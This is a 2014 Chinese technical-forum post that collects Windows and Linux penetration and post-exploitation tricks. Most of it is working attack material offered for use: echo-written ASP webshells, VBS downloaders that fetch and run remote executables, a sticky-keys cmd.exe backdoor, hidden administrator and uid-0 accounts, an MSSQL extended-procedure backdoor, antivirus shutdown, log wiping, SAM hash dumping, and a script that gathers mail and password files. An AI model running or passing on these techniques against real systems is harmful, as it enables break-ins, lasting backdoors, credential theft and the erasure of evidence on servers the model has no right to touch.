渗透技巧总结、渗透技巧 _VMware, Unix及操作系统讨论区_Weblogic技术|Tuxedo技术|中间件技术|Oracle论坛|JAVA论坛|Linux/Unix技术|hadoop论坛_联动北方技术论坛  
网站首页 | 关于我们 | 服务中心 | 经验交流 | 公司荣誉 | 成功案例 | 合作伙伴 | 联系我们 |
联动北方-国内领先的云技术服务提供商
»  游客             当前位置:  论坛首页 »  自由讨论区 »  VMware, Unix及操作系统讨论区 »
总帖数
1
每页帖数
101/1页1
返回列表
0
发起投票  发起投票 发新帖子
查看: 4115 | 回复: 0   主题: 渗透技巧总结、渗透技巧         下一篇 
    本主题由 Administrator 于 2014-9-6 8:19:27 移动
demo11
渠道商伙伴
等级:新兵
经验:78
发帖:1
精华:0
注册:2014-7-4
状态:离线
发送短消息息给demo11 加好友    发送短消息息给demo11 发消息
发表于: IP:您无权察看 2014-9-5 11:30:55 | [全部帖] [楼主帖] 楼主

旁站路径问题1、读网站配置。2、用以下VBSOn Error Resume NextIf (LCase(Right(WScript.Fullname,11))="wscript.exe") ThenMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "Usage:Cscript vWeb.vbs",4096,"Lilo"WScript.QuitEnd IfSet ObjService=GetObject("IIS://LocalHost/W3SVC")For Each obj3w In objserviceIf IsNumeric(obj3w.Name)ThenSet OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")If Err<> 0 Then WScript.Quit (1)WScript.Echo Chr(10) & "[" &OService.ServerComment & "]"For Each Binds In OService.ServerBindingsWeb = "{ " & Replace(Binds,":"," } { ") & " }"WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")NextWScript.Echo "Path : " & VDirObj.PathEnd IfNext3、iis_spy列举(注:需要支持ASPX,反IISSPY的方法:将activeds.dll,activeds.tlb降权)4、得到目标站目录,不能直接跨的。通过echo ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp 像目标目录写入webshell。或者还可以试试type命令.—————————————————————WordPress的平台,爆绝对路径的方法是:url/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.php——————————————————————phpMyAdmin暴路径办法:phpMyAdmin/libraries/select_lang.lib.phpphpMyAdmin/darkblue_orange/layout.inc.phpphpMyAdmin/index.php?lang[]=1phpmyadmin/themes/darkblue_orange/layout.inc.php————————————————————网站可能目录(注:一般是虚拟主机类)data/htdocs.网站/网站/————————————————————CMD下操作VPN相关netsh ras set user administrator permit #允许administrator拨入该VPNnetsh ras set user administrator deny #禁止administrator拨入该VPNnetsh ras show user #查看哪些用户可以拨入VPNnetsh ras ip show config #查看VPN分配IP的方式netsh ras ip set addrassign method = pool #使用地址池的方式分配IPnetsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254————————————————————命令行下添加SQL用户的方法需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:exec master.dbo.sp_addlogin test,123EXEC sp_addsrvrolemember ‘test, ‘sysadmin’然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry另类的加用户方法在删掉了net.exe和不用adsi之外,新的加用户的方法。代码如下:js:var o=new ActiveXObject( “Shell.Users” );z=o.create(“test”) ;z.changePassword(“123456″,”")z.setting(“AccountType”)=3;vbs:Set o=CreateObject( “Shell.Users” )Set z=o.create(“test”)z.changePassword “123456″,”"z.setting(“AccountType”)=3——————————————————cmd访问控制权限控制(注:反everyone不可读,工具-文件夹选项-使用简单的共享去掉即可)命令如下cacls c: /e /t /g everyone:F #c盘everyone权限cacls “目录” /d everyone #everyone不可读,包括admin————————以下配合PR更好————3389相关a、防火墙TCP/IP筛选.(关闭net stop policyagent & net stop sharedaccess)b、内网环境(LCX)c、终端服务器超出了最大允许连接XP 运行mstsc /admin2003 运行mstsc /console杀软关闭(把杀软所在的文件的所有权限去掉)处理变态诺顿企业版:net stop “Symantec AntiVirus” /ynet stop “Symantec AntiVirus Definition Watcher” /ynet stop “Symantec Event Manager” /ynet stop “System Event Notification” /ynet stop “Symantec Settings Manager” /y卖咖啡:net stop “McAfee McShield”————————————————————5次SHIFT:copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.execopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /ycopy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y——————————————————————隐藏账号添加:1、net user admin$ 123456 /add&net localgroup administrators admin$ /add2、导出注册表SAM下用户的两个键值3、在用户管理界面里的admin$删除,然后把备份的注册表导回去。4、利用Hacker Defender把相关用户注册表隐藏——————————————————————MSSQL扩展后门:USE master;EXEC sp_addextendedproc ‘xp_helpsystem’, ‘xp_helpsystem.dll’;GRANT exec On xp_helpsystem TO public;———————————————————————日志处理C:\WINNT\system32\LogFiles\MSFTPSVC1>下有ex011120.log / ex011121.log / ex011124.log三个文件,直接删除 ex0111124.log不成功,“原文件…正在使用”当然可以直接删除ex011120.log / ex011121.log用记事本打开ex0111124.log,删除里面的一些内容后,保存,覆盖退出,成功。当停止msftpsvc服务后可直接删除ex011124.logMSSQL查询分析器连接记录清除:MSSQL 2000位于注册表如下:HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers找到接接过的信息删除。MSSQL 2005是在C:\Documents and Settings\\Application Data\Microsoft\Microsoft SQLServer\90\Tools\Shell\mru.dat—————————————————————————防BT系统拦截可使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了)<%Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)Dim Ads, Retrieval, GetRemoteDataOn Error Resume NextSet Retrieval = Server.CreateObject("Microsoft.XMLHTTP")With Retrieval.Open "Get", s_RemoteFileUrl, False, "", "".SendGetRemoteData = .ResponseBodyEnd WithSet Retrieval = NothingSet Ads = Server.CreateObject("Adodb.Stream")With Ads.Type = 1.Open.Write GetRemoteData.SaveToFile Server.MapPath(s_LocalFileName), 2.Cancel().Close()End WithSet Ads=nothingEnd SubeWebEditor_SaveRemoteFile"your shell's name","your shell'urL"%>VNC提权方法利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\passwordRadmin 默认端口是4899,HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置然后用HASH版连接。如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过PCANYWHERE从本机登陆服务器。保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下,那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\AllUsers\Application Data\Symantec\pcAnywhere\文件夹下。——————————————————————搜狗输入法的PinyinUp.exe是可读可写的直接替换即可—————————————————————-WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式下下来,看路径,访问 路径\web传shell,访问shell后,权限是system,放远控进启动项,等待下次重启。没有删cmd组建的直接加用户。7i24的web目录也是可写,权限为administrator。1433 SA点构建注入点<%strSQLServerName = "服务器ip"strSQLDBUserName = "数据库帐号"strSQLDBPassword = "数据库密码"strSQLDBName = "数据库名称"Set conn = Server.createObject("ADODB.Connection")strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName &";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" &strSQLDBName & ";"conn.open strCondim rs,strSQL,idset rs=server.createobject("ADODB.recordset")id = request("id")strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3rs.close%>******liunx 相关******一.ldap渗透技巧1.cat /etc/nsswitch看看密码登录策略我们可以看到使用了file ldap模式2.less /etc/ldap.confbase ou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b“cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2有密码形式ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b“cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.24.查找10条用户记录ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口实战:1.cat /etc/nsswitch看看密码登录策略我们可以看到使用了file ldap模式2.less /etc/ldap.confbase ou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b“cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2有密码形式ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b“cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.24.查找10条用户记录ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口渗透实战:1.返回所有的属性ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s sub “objectclass=*”version: 1dn: dc=ruc,dc=edu,dc=cndc: rucobjectClass: domaindn: uid=manager,dc=ruc,dc=edu,dc=cnuid: managerobjectClass: inetOrgPersonobjectClass: organizationalPersonobjectClass: personobjectClass: topsn: managercn: managerdn: uid=superadmin,dc=ruc,dc=edu,dc=cnuid: superadminobjectClass: inetOrgPersonobjectClass: organizationalPersonobjectClass: personobjectClass: topsn: superadmincn: superadmindn: uid=admin,dc=ruc,dc=edu,dc=cnuid: adminobjectClass: inetOrgPersonobjectClass: organizationalPersonobjectClass: personobjectClass: topsn: admincn: admindn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cnuid: dcp_anonymousobjectClass: topobjectClass: personobjectClass: organizationalPersonobjectClass: inetOrgPersonsn: dcp_anonymouscn: dcp_anonymous2.查看基类bash-3.00# ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s base “objectclass=*” |moreversion: 1dn: dc=ruc,dc=edu,dc=cndc: rucobjectClass: domain3.查找bash-3.00# ldapsearch -h 192.168.7.33 -b “” -s base “objectclass=*”version: 1dn:objectClass: topnamingContexts: dc=ruc,dc=edu,dc=cnsupportedExtension: 2.16.840.1.113730.3.5.7supportedExtension: 2.16.840.1.113730.3.5.8supportedExtension: 1.3.6.1.4.1.4203.1.11.1supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25supportedExtension: 2.16.840.1.113730.3.5.3supportedExtension: 2.16.840.1.113730.3.5.5supportedExtension: 2.16.840.1.113730.3.5.6supportedExtension: 2.16.840.1.113730.3.5.4supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24supportedExtension: 1.3.6.1.4.1.1466.20037supportedExtension: 1.3.6.1.4.1.4203.1.11.3supportedControl: 2.16.840.1.113730.3.4.2supportedControl: 2.16.840.1.113730.3.4.3supportedControl: 2.16.840.1.113730.3.4.4supportedControl: 2.16.840.1.113730.3.4.5supportedControl: 1.2.840.113556.1.4.473supportedControl: 2.16.840.1.113730.3.4.9supportedControl: 2.16.840.1.113730.3.4.16supportedControl: 2.16.840.1.113730.3.4.15supportedControl: 2.16.840.1.113730.3.4.17supportedControl: 2.16.840.1.113730.3.4.19supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1supportedControl: 2.16.840.1.113730.3.4.14supportedControl: 1.3.6.1.4.1.1466.29539.12supportedControl: 2.16.840.1.113730.3.4.12supportedControl: 2.16.840.1.113730.3.4.18supportedControl: 2.16.840.1.113730.3.4.13supportedSASLMechanisms: EXTERNALsupportedSASLMechanisms: DIGEST-MD5supportedLDAPVersion: 2supportedLDAPVersion: 3vendorName: Sun Microsystems, Inc.vendorVersion: Sun-Java™-System-Directory/6.2dataversion: 020090516011411netscapemdsuffix: cn=ldap://dc=webA:389supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHAsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHAsupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHAsupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHAsupportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHAsupportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHAsupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHAsupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHAsupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHAsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHAsupportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHAsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHAsupportedSSLCiphers: SSL_RSA_WITH_NULL_SHAsupportedSSLCiphers: SSL_RSA_WITH_NULL_MD5supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5————————————2. NFS渗透技巧showmount -e ip列举IP——————3.rsync渗透技巧1.查看rsync服务器上的列表rsync 210.51.X.X::financeimg_financeautoimg_autohtml_cmsimg_cmsent_cmsent_imgceshires_imgres_img_c2chipchip_c2ent_icmsgamesgamesimgmediamediaimgfashionres-fashionres-fotaobao-homeres-taobao-homehouseres-houseres-homeres-edures-entres-labsres-newsres-phtvres-mediahomeedunewsres-book看相应的下级目录(注意一定要在目录后面添加上/)rsync 210.51.X.X::htdocs_app/rsync 210.51.X.X::auto/rsync 210.51.X.X::edu/2.下载rsync服务器上的配置文件rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/3.向上更新rsync文件(成功上传,不会覆盖)rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/http://app.finance.xxx.com/warn/nothack.txt四.squid渗透技巧nc -vv baidu.com 80GET HTTP://www.sina.com / HTTP/1.0GET HTTP://WWW.sina.com:22 / HTTP/1.0五.SSH端口转发ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip六.joomla渗透小技巧确定版本index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47重新设置密码index.php?option=com_user&view=reset&layout=confirm七: Linux添加UID为0的root用户useradd -o -u 0 nothack八.freebsd本地提权[argp@julius ~]$ uname -rsi* freebsd 7.3-RELEASE GENERIC* [argp@julius ~]$ sysctl vfs.usermount* vfs.usermount: 1* [argp@julius ~]$ id* uid=1001(argp) gid=1001(argp) groups=1001(argp)* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex* [argp@julius ~]$ ./nfs_mount_ex*calling nmount()(注:本文原件由0x童鞋收集整理,感谢0x童鞋,本人补充和优化了点,本文毫无逻辑可言,因为是想到什么就写了,大家见谅)——————————————感谢T00LS的童鞋们踊跃交流,让我学到许多经验,为了方便其他童鞋浏览,将T00LS的童鞋们补充的贴在下面,同时我也会以后将自己的一些想法跟新在后面。————————————————————————————1、tar打包 tar -cvf /home/public_html/*.tar /home/public_html/–exclude= 排除文件*.gif 排除目录 /xx/xx/*alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar{注:关于tar的打包方式,linux不以扩展名来决定文件类型。若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/–exclude= 排除文件*.gif 排除目录 /xx/xx/*}提权先执行systeminfotoken 漏洞补丁号 KB956572Churrasco kb952004命令行RAR打包~~·rar a -k -r -s -m3 c:\1.rar c:\folder——————————————2、收集系统信息的脚本for window:@echo offecho #########system info collectionsysteminfoverhostnamenet usernet localgroupnet localgroup administratorsnet user guestnet user administratorecho #######at- with atq#####echo schtask /queryechoecho ####task-list#############tasklist /svcechoecho ####net-work infomationipconfig/allroute printarp -anetstat -anipconfig /displaydnsechoecho #######service############sc query type= service state= allecho #######file-##############cd \tree -Ffor linux:#!/bin/bashecho #######geting sysinfo####echo ######usage: ./getinfo.sh >/tmp/sysinfo.txtecho #######basic infomation##cat /proc/meminfoechocat /proc/cpuinfoechorpm -qa 2>/dev/null######stole the mail……######cp -a /var/mail /tmp/getmail 2>/dev/nullecho ‘u’r id is’ `id`echo ###atq&crontab#####atqcrontab -lecho #####about var#####setecho #####about network#######this is then point in pentest,but i am a new bird,so u need to add some in itcat /etc/hostshostnameipconfig -aarp -vecho ########user####cat /etc/passwd|grep -i shecho ######service####chkconfig –listfor i in {oracle,mysql,tomcat,samba,apache,ftp}cat /etc/passwd|grep -i $idonelocate passwd >/tmp/password 2>/dev/nullsleep 5locate password >>/tmp/password 2>/dev/nullsleep 5locate conf >/tmp/sysconfig 2>dev/nullsleep 5locate config >>/tmp/sysconfig 2>/dev/nullsleep 5###maybe can use “tree /”###echo ##packing up#########tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfigrm -rf /tmp/getmail /tmp/password /tmp/sysconfig——————————————3、ethash 不免杀怎么获取本机hash。首先导出注册表 regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” (2000)reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg (2003)注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了hash 抓完了记得把自己的账户密码改过来哦!据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~——————————————4、vbs 下载者1echo Set sGet = createObject(“ADODB.Stream”) >>c:\windows\cftmon.vbsecho sGet.Mode = 3 >>c:\windows\cftmon.vbsecho sGet.Type = 1 >>c:\windows\cftmon.vbsecho sGet.Open() >>c:\windows\cftmon.vbsecho sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbsecho sGet.SaveToFile “c:\windows\e.exe”,2 >>c:\windows\cftmon.vbsecho Set objShell = CreateObject(“Wscript.Shell”) >>c:\windows\cftmon.vbsecho objshell.run “”"c:\windows\e.exe”"” >>c:\windows\cftmon.vbscftmon.vbs2On Error Resume Next:Dim iRemote,iLocal,s1,s2iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))s1=”Mi”+”cro”+”soft”+”.”+”XML”+”HTTP”:s2=”ADO”+”DB”+”.”+”Stream”Set xPost = CreateObject(s1):xPost.Open “GET”,iRemote,0:xPost.Send()Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe当GetHashes获取不到hash时,可以用兵刃把sam复制到桌面——————————————————5、1.查询终端端口REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber2.开启XP&2003终端服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3.更改终端端口为2008(0x7d8)REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /fREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f————————————————6、create table a (cmd text);insert into a values (“set wshshell=createobject (“”wscript.shell”")”);insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add”",0)”);insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add”",0)”);select * from a into outfile “C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs”;————————————————————7、BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能).LINUX常见路径:/etc/passwd/etc/shadow/etc/fstab/etc/host.conf/etc/motd/etc/ld.so.conf/var/www/htdocs/index.php/var/www/conf/httpd.conf/var/www/htdocs/index.html/var/httpd/conf/php.ini/var/httpd/htdocs/index.php/var/httpd/conf/httpd.conf/var/httpd/htdocs/index.html/var/httpd/conf/php.ini/var/www/index.html/var/www/index.php/opt/www/conf/httpd.conf/opt/www/htdocs/index.php/opt/www/htdocs/index.html/usr/local/apache/htdocs/index.html/usr/local/apache/htdocs/index.php/usr/local/apache2/htdocs/index.html/usr/local/apache2/htdocs/index.php/usr/local/httpd2.2/htdocs/index.php/usr/local/httpd2.2/htdocs/index.html/tmp/apache/htdocs/index.html/tmp/apache/htdocs/index.php/etc/httpd/htdocs/index.php/etc/httpd/conf/httpd.conf/etc/httpd/htdocs/index.html/www/php/php.ini/www/php4/php.ini/www/php5/php.ini/www/conf/httpd.conf/www/htdocs/index.php/www/htdocs/index.html/usr/local/httpd/conf/httpd.conf/apache/apache/conf/httpd.conf/apache/apache2/conf/httpd.conf/etc/apache/apache.conf/etc/apache2/apache.conf/etc/apache/httpd.conf/etc/apache2/httpd.conf/etc/apache2/vhosts.d/00_default_vhost.conf/etc/apache2/sites-available/default/etc/phpmyadmin/config.inc.php/etc/mysql/my.cnf/etc/httpd/conf.d/php.conf/etc/httpd/conf.d/httpd.conf/etc/httpd/logs/error_log/etc/httpd/logs/error.log/etc/httpd/logs/access_log/etc/httpd/logs/access.log/home/apache/conf/httpd.conf/home/apache2/conf/httpd.conf/var/log/apache/error_log/var/log/apache/error.log/var/log/apache/access_log/var/log/apache/access.log/var/log/apache2/error_log/var/log/apache2/error.log/var/log/apache2/access_log/var/log/apache2/access.log/var/www/logs/error_log/var/www/logs/error.log/var/www/logs/access_log/var/www/logs/access.log/usr/local/apache/logs/error_log/usr/local/apache/logs/error.log/usr/local/apache/logs/access_log/usr/local/apache/logs/access.log/var/log/error_log/var/log/error.log/var/log/access_log/var/log/access.log/usr/local/apache/logs/access_logaccess_log.old/usr/local/apache/logs/error_logerror_log.old/etc/php.ini/bin/php.ini/etc/init.d/httpd/etc/init.d/mysql/etc/httpd/php.ini/usr/lib/php.ini/usr/lib/php/php.ini/usr/local/etc/php.ini/usr/local/lib/php.ini/usr/local/php/lib/php.ini/usr/local/php4/lib/php.ini/usr/local/php4/php.ini/usr/local/php4/lib/php.ini/usr/local/php5/lib/php.ini/usr/local/php5/etc/php.ini/usr/local/php5/php5.ini/usr/local/apache/conf/php.ini/usr/local/apache/conf/httpd.conf/usr/local/apache2/conf/httpd.conf/usr/local/apache2/conf/php.ini/etc/php4.4/fcgi/php.ini/etc/php4/apache/php.ini/etc/php4/apache2/php.ini/etc/php5/apache/php.ini/etc/php5/apache2/php.ini/etc/php/php.ini/etc/php/php4/php.ini/etc/php/apache/php.ini/etc/php/apache2/php.ini/web/conf/php.ini/usr/local/Zend/etc/php.ini/opt/xampp/etc/php.ini/var/local/www/conf/php.ini/var/local/www/conf/httpd.conf/etc/php/cgi/php.ini/etc/php4/cgi/php.ini/etc/php5/cgi/php.ini/php5/php.ini/php4/php.ini/php/php.ini/PHP/php.ini/apache/php/php.ini/xampp/apache/bin/php.ini/xampp/apache/conf/httpd.conf/NetServer/bin/stable/apache/php.ini/home2/bin/stable/apache/php.ini/home/bin/stable/apache/php.ini/var/log/mysql/mysql-bin.log/var/log/mysql.log/var/log/mysqlderror.log/var/log/mysql/mysql.log/var/log/mysql/mysql-slow.log/var/mysql.log/var/lib/mysql/my.cnf/usr/local/mysql/my.cnf/usr/local/mysql/bin/mysql/etc/mysql/my.cnf/etc/my.cnf/usr/local/cpanel/logs/usr/local/cpanel/logs/stats_log/usr/local/cpanel/logs/access_log/usr/local/cpanel/logs/error_log/usr/local/cpanel/logs/license_log/usr/local/cpanel/logs/login_log/usr/local/cpanel/logs/stats_log/usr/local/share/examples/php4/php.ini/usr/local/share/examples/php/php.ini2..windows常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘)c:\windows\php.inic:\boot.inic:\1.txtc:\a.txtc:\CMailServer\config.inic:\CMailServer\CMailServer.exec:\CMailServer\WebMail\index.aspc:\program files\CMailServer\CMailServer.exec:\program files\CMailServer\WebMail\index.aspC:\WinWebMail\SysInfo.iniC:\WinWebMail\Web\default.aspC:\WINDOWS\FreeHost32.dllC:\WINDOWS\7i24iislog4.exeC:\WINDOWS\7i24tool.exec:\hzhost\databases\url.aspc:\hzhost\hzclient.exeC:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnkC:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U 